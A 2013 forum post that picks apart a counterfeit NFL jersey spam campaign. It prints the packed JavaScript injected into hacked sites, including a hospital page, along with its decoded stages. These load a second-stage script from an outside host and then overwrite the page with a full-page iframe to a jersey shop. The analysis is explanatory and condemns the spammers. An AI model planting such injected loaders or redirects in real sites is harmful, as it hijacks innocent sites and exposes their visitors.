Check out the massive loop these fake NFL jersey spammers put everyone through whenever they post massive amounts of spam to forums around the world...
Our ridiculous Chinese "cheap NFL jersey" high-volume spammer keeps coming back, and he keeps posting
dozens to hundreds of hacked server links.
The pattern goes:
JavaScript Obfuscation injected onto a hacked domain:
http
://www.herzoghospital.org/site/news/cheap-nfl-jerseys.html
Code:
<script language="javascript">
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('c 1=3.4(\'9\');1.a(\'b\',\'5://d.8.0.2/6.7\');',62,14,'1qidc|a|com|document|getElementById|http|jquery|js|kr3|ourjs|setAttribute|src|var|xiaofengfeng'.split('|'),0,{}))
</script>
Step 1: load
secondary obfuscated JavaScript:
Code:
var a=document.getElementById('ourjs');a.setAttribute('src','http://xiaofengfeng.kr3.1qidc.com/jquery.js');
http
://xiaofengfeng.kr3.1qidc.com/jquery.js
Code:
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=
k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('6.7.8.5="<4 1=\'2%\' 3=\'9\' a=\'i\' g=\'0\' f=\'e://b.c.d.h/\'>";',19,19,'|width|100|scrolling|iframe|innerHTML|top|document|body|no|height|www|jerseyscheap|us|
http|src|frameborder|com|2000'.split('|'),0,{}))
Step 2: Eval
that function to send the user to the actual target domain:
Code:
top.document.body.innerHTML="<iframe width='100%' scrolling='no' height='2000' frameborder='0' src='http://www.jerseyscheap.us.com/'>";
http
://www.jerseyscheap.us.com/
Phew.
What a runaround.
You know that phrase about being a good businessman? "Don't sh*t where you eat?" These guys sh*t where everybody eats. They're complete scumbags. They don't care if they end up getting thousands of hosting agreements cancelled or destroy a significant number of otherwise harmless sites owned by unsuspecting operators.
And nobody will shut any of this down. It's depressing.
SiL
Posted: Tue Jul 30, 2013 5:03 pm 
